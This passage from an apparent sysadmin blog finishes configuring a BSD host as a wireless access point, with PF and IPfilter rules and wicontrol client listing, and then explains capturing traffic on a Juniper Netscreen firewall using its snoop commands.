    ifconfig wi0 ssid My_Network channel 11 media DS/11Mbps mediaopt hostap up stationname "My Network"

    Of course this can all be setup in the /etc/rc.conf file so that these settings are retained every time the system boots. From this point, your access point should be up and broadcasting. There are just a couple more options to consider

      Post Configuration

    As stated earlier, if the wireless interface is installed in a server that is functioning as a Firewall/NAT, then the bridging option is unecessary. We just need to add a couple of rules to our firewall configuration files to allow traffic to be passed from the wireless interface.

    If you are using PF as your Firewall/NAT solution, simply add the following lines to your /etc/pf.conf file

    pass in on wi0 from wi0:network to any keep state
    pass out on wi0 from any to $wi0:network keep state

    Replace wi0 with the appropriate interface name of your wireless card

    If you are using IPfilter as your Firewall/NAT solution, then simply add the following lines to your /etc/ipf.rules file

    pass in on wi0 from any to any keep state
    pass out on wi0 from any to any keep state

    Again, replace wi0 with the appropriate interface name of your wireless card.

      Administration

    Once the access point is configured and operational, we will want to see the clients that are associated with the access point. We can type the following command to get this information:

    root@host# wicontrol -l
    1 station:
    ap[0]:
            netname (SSID):                 [ My_Network ]
            BSSID:                          [ 00:04:23:60:89:d9 ]
            Channel:                        [ 11 ]
            Quality/Signal/Noise [signal]:  [ 0 / 51 / 0 ]
                                    [dBm]:  [ 0 / -98 / -149 ]
            BSS Beacon Interval [msec]:     [ 10 ]
            Capinfo:                        [ ESS ]

    Now you should have a complete functioning access point up and running. You are encouraged to read more about the wicontrol and wi commands for further information.

    Monitoring raw traffic on a Juniper Netscreen

    Occasionally I will run into situations where the only way to definitively diagnose network related problems is to perform raw traffic dumps on a main internal / external interface.

    The reasons for needing to perform this could be anything. I thought I’d share the quick and easy steps to perform in order to do a quick network traffic capture.

    Be warned though, that it is easy to overflow the console buffer and subsequently crash your firewall if you don’t narrow the scope of your capture enough.

    There exists a command on the juniper netscreen console that works the same way that tcpdump would, called “snoop”.

    To view the current snoop settings :

    snoop info

    To monitor all traffic from a particular ip address going to a particular port :

    snoop filter ip src-ip x.x.x.x dst-port 23

    To monitor all traffic on the network going to a particular ip address :

    snoop filter ip dst-ip x.x.x.x

    The above commands only SET the filter. You have to turn the filter on and monitor the buffer to actually view the results. Note that you should ensure that the scope of your filters are quite narrow as there is the risk of overflowing the console buffer and crashing the firewall if you are monitoring a wide scope.

    To view the filters and turn on snoop :

    clear dbuf
    snoop
    get dbuf stream

    Dont forget to clear the filters , dbuf stream and turn off snoop when your done :

    snoop off
    clear dbuf
    snoop filter delete

    That’s it!

    Menu